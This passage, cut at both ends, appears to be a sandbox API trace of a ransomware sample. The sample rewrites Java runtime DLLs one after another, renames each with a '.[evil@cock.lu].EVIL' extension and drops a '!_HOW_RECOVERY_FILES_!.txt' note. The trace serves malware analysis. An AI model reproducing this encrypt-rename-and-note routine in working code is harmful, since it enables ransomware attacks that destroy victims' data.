lpFindFileData=0x84b0fdda00) returned 1 [0090.966] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.966] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\dtplugin\\..") returned 51 [0090.966] wcscmp (_String1=".", _String2="..") returned -1 [0090.966] wcscmp (_String1="..", _String2="..") returned 0 [0090.966] FindNextFileW (in: hFindFile=0x84b11dde60, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0090.966] wcsstr (_Str="deployJava1.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.966] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\dtplugin\\deployJava1.dll") returned 64 [0090.966] wcscmp (_String1="deployJava1.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0090.966] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="deployJava1.dll") returned 0x0 [0090.966] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\dtplugin\\deployJava1.dll") returned 0x40 [0090.967] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\dtplugin\\deployJava1.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\dtplugin\\deployjava1.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0090.968] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xfa440, lpOverlapped=0x0) returned 1 [0091.017] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0091.017] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0091.017] _errno () returned 0x84b1160840 [0091.018] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.018] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0xfa460, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xfa460, lpOverlapped=0x0) returned 1 [0091.032] CloseHandle (hObject=0x1a8) returned 1 [0091.032] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\dtplugin\\deployJava1.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0091.034] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0091.034] __uncaught_exception () returned 0x84b1160800 [0091.034] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0091.034] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\dtplugin\\deployJava1.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\dtplugin\\deployjava1.dll"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\dtplugin\\deployJava1.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\dtplugin\\deployjava1.dll.[evil@cock.lu].evil")) returned 1 [0091.035] ??_V@YAXPEAX@Z () returned 0x1 [0091.037] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\dtplugin\\deployJava1.dll", dwFileAttributes=0x0) returned 0 [0091.037] FindNextFileW (in: hFindFile=0x84b11dde60, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0091.037] wcsstr (_Str="npdeployJava1.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0091.038] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\dtplugin\\npdeployJava1.dll") returned 66 [0091.038] wcscmp (_String1="npdeployJava1.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0091.038] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="npdeployJava1.dll") returned 0x0 [0091.038] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\dtplugin\\npdeployJava1.dll") returned 0x42 [0091.038] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\dtplugin\\npdeployJava1.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\dtplugin\\npdeployjava1.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0091.039] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x100000, lpOverlapped=0x0) returned 1 [0091.072] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0091.072] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0091.072] _errno () returned 0x84b1160840 [0091.074] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.074] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x100020, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x100020, lpOverlapped=0x0) returned 1 [0091.091] CloseHandle (hObject=0x1a8) returned 1 [0091.092] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\dtplugin\\npdeployJava1.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0091.092] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0091.092] __uncaught_exception () returned 0x84b1160800 [0091.092] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0091.093] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\dtplugin\\npdeployJava1.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\dtplugin\\npdeployjava1.dll"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\dtplugin\\npdeployJava1.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\dtplugin\\npdeployjava1.dll.[evil@cock.lu].evil")) returned 1 [0091.093] ??_V@YAXPEAX@Z () returned 0x1 [0091.097] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\dtplugin\\npdeployJava1.dll", dwFileAttributes=0x0) returned 0 [0091.097] FindNextFileW (in: hFindFile=0x84b11dde60, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0 [0091.097] FindClose (in: hFindFile=0x84b11dde60 | out: hFindFile=0x84b11dde60) returned 1 [0091.097] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\dtplugin") returned 0x30 [0091.097] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0091.097] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0091.097] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\dtplugin\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0091.111] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0091.111] __uncaught_exception () returned 0x84b1160800 [0091.111] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0091.112] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0091.112] wcsstr (_Str="dt_shmem.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0091.112] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\dt_shmem.dll") returned 52 [0091.112] wcscmp (_String1="dt_shmem.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0091.112] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="dt_shmem.dll") returned 0x0 [0091.112] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\dt_shmem.dll") returned 0x34 [0091.112] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\dt_shmem.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\dt_shmem.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0091.114] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x7440, lpOverlapped=0x0) returned 1 [0091.130] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0091.130] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0091.130] _errno () returned 0x84b1160840 [0091.131] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.131] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x7460, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x7460, lpOverlapped=0x0) returned 1 [0091.131] CloseHandle (hObject=0x1a4) returned 1 [0091.131] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\dt_shmem.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0091.131] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0091.132] __uncaught_exception () returned 0x84b1160800 [0091.132] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0091.132] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\dt_shmem.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\dt_shmem.dll"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\dt_shmem.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\dt_shmem.dll.[evil@cock.lu].evil")) returned 1 [0091.132] ??_V@YAXPEAX@Z () returned 0x1 [0091.138] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\dt_shmem.dll", dwFileAttributes=0x0) returned 0 [0091.139] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0091.139] wcsstr (_Str="dt_socket.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0091.139] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\dt_socket.dll") returned 53 [0091.139] wcscmp (_String1="dt_socket.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0091.139] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="dt_socket.dll") returned 0x0 [0091.139] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\dt_socket.dll") returned 0x35 [0091.139] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\dt_socket.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\dt_socket.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0091.141] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x6040, lpOverlapped=0x0) returned 1 [0091.180] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0091.180] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0091.180] _errno () returned 0x84b1160840 [0091.180] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.180] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x6060, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x6060, lpOverlapped=0x0) returned 1 [0091.180] CloseHandle (hObject=0x1a4) returned 1 [0091.181] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\dt_socket.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0091.181] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0091.181] __uncaught_exception () returned 0x84b1160800 [0091.181] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0091.181] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\dt_socket.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\dt_socket.dll"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\dt_socket.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\dt_socket.dll.[evil@cock.lu].evil")) returned 1 [0091.182] ??_V@YAXPEAX@Z () returned 0x1 [0091.184] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\dt_socket.dll", dwFileAttributes=0x0) returned 0 [0091.184] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0091.184] wcsstr (_Str="eula.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0091.185] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\eula.dll") returned 48 [0091.185] wcscmp (_String1="eula.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0091.185] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="eula.dll") returned 0x0 [0091.185] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\eula.dll") returned 0x30 [0091.185] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\eula.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\eula.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0091.187] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x21440, lpOverlapped=0x0) returned 1 [0091.216] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0091.216] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0091.216] _errno () returned 0x84b1160840 [0091.216] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.216] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x21460, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x21460, lpOverlapped=0x0) returned 1 [0091.231] CloseHandle (hObject=0x1a4) returned 1 [0091.246] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\eula.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0091.248] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0091.248] __uncaught_exception () returned 0x84b1160800 [0091.248] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0091.248] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\eula.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\eula.dll"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\eula.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\eula.dll.[evil@cock.lu].evil")) returned 1 [0091.249] ??_V@YAXPEAX@Z () returned 0x1 [0091.251] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\eula.dll", dwFileAttributes=0x0) returned 0 [0091.251] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0091.251] wcsstr (_Str="fontmanager.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0091.251] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\fontmanager.dll") returned 55 [0091.251] wcscmp (_String1="fontmanager.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0091.251] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="fontmanager.dll") returned 0x0 [0091.252] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\fontmanager.dll") returned 0x37 [0091.252] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\fontmanager.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\fontmanager.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0091.253] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x43040, lpOverlapped=0x0) returned 1 [0091.335] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0091.335] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0091.335] _errno () returned 0x84b1160840 [0091.336] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.336] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x43060, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x43060, lpOverlapped=0x0) returned 1 [0091.336] CloseHandle (hObject=0x1a4) returned 1 [0091.336] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\fontmanager.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0091.337] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0091.337] __uncaught_exception () returned 0x84b1160800 [0091.337] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0091.337] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\fontmanager.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\fontmanager.dll"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\fontmanager.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\fontmanager.dll.[evil@cock.lu].evil")) returned 1 [0091.337] ??_V@YAXPEAX@Z () returned 0x1 [0091.340] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\fontmanager.dll", dwFileAttributes=0x0) returned 0 [0091.340] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0091.340] wcsstr (_Str="fxplugins.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0091.340] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\fxplugins.dll") returned 53 [0091.340] wcscmp (_String1="fxplugins.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0091.340] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="fxplugins.dll") returned 0x0 [0091.340] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\fxplugins.dll") returned 0x35 [0091.340] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\fxplugins.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\fxplugins.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0091.342] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x2da40, lpOverlapped=0x0) returned 1 [0091.353] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0091.353] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0091.353] _errno () returned 0x84b1160840 [0091.354] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.354] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x2da60, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x2da60, lpOverlapped=0x0) returned 1 [0091.354] CloseHandle (hObject=0x1a4) returned 1 [0091.354] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\fxplugins.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0091.355] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0091.355] __uncaught_exception () returned 0x84b1160800 [0091.355] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0091.355] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\fxplugins.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\fxplugins.dll"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\fxplugins.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\fxplugins.dll.[evil@cock.lu].evil")) returned 1 [0091.355] ??_V@YAXPEAX@Z () returned 0x1 [0091.358] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\fxplugins.dll", dwFileAttributes=0x0) returned 0 [0091.359] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0091.359] wcsstr (_Str="glass.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0091.359] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\glass.dll") returned 49 [0091.359] wcscmp (_String1="glass.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0091.359] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="glass.dll") returned 0x0 [0091.359] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\glass.dll") returned 0x31 [0091.359] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\glass.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\glass.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0091.362] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x40e40, lpOverlapped=0x0) returned 1 [0091.367] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0091.367] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0091.367] _errno () returned 0x84b1160840 [0091.368] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.368] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x40e60, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x40e60, lpOverlapped=0x0) returned 1 [0091.368] CloseHandle (hObject=0x1a4) returned 1 [0091.369] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\glass.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0091.369] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0091.369] __uncaught_exception () returned 0x84b1160800 [0091.369] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0091.369] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\glass.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\glass.dll"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\glass.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\glass.dll.[evil@cock.lu].evil")) returned 1 [0091.370] ??_V@YAXPEAX@Z () returned 0x1 [0091.373] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\glass.dll", dwFileAttributes=0x0) returned 0 [0091.373] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: 